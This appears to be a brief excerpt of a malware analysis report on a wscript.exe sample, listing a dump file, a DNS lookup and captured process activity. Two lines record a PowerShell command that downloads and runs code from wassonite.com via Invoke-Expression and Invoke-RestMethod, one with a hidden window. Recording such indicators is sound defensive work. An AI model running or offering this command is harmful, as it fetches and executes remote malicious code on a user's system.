Technical Information
- %TEMP%\content\3096-1600-wscript.exe-04-33-33-860.dump
- 'wa###nite.com':80
- DNS ASK wa###nite.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)